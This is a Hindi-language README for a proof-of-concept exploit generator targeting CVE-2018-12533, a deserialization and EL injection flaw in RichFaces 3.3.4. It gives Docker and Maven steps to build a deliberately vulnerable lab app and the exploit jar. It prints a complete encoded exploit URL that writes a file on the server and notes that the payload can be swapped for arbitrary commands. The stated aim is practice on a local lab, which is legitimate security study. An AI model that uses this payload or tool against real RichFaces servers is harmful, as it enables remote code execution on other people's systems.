
RF-14310 / CVE-2018-12533 - पेलोड जनरेटर
सारा श्रेय https://github.com/Lucifaer को जाता है
https://access.redhat.com/security/cve/cve-2018-12533
पुराने Java संस्करणों आदि के बारे में अधिक चिंता किए बिना, Richfaces 3.3.4 deserialization + EL injection शोषण का अभ्यास करने के लिए आसानी से तैनात होने वाला प्रूफ ऑफ कॉन्सेप्ट।
आपको एक कमजोर (असुरक्षित) एप्लिकेशन सेट अप करने की परेशानी से बचाने के लिए, मैंने CVE-2018-14667 की व्याख्या करने वाले seclist लेख के निर्देशों के आधार पर एक Dockerfile बनाई है। बस रिपॉजिटरी की मूल निर्देशिका में निम्नलिखित कमांड चलाएँ:
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss
यदि सब कुछ ठीक रहा, तो आप richfaces photoalbum परीक्षण एप्लिकेशन को http://127.0.0.1:8081/photoalbum पर एक्सेस कर सकते हैं।
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install
java -jar target/cve_2018_12533.jar
यदि आप /tmp में फ़ाइल बनाने के अलावा कुछ और करना चाहते हैं, तो /DATA/XXXXX भाग को अपने पेलोड से बदलें। यह पेलोड /tmp/hacked.txt बनाता है। http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf
docker ps
docker exec -it <containerid> bash
ls /tmp
जब आप एक्सप्लॉइट को बिना किसी बदलाव के उपयोग करते हैं, तो यह /tmp/cve_2018_12533 बनाएगा, इस तरह आप पुष्टि कर सकते हैं कि एक्सप्लॉइट काम किया या नहीं।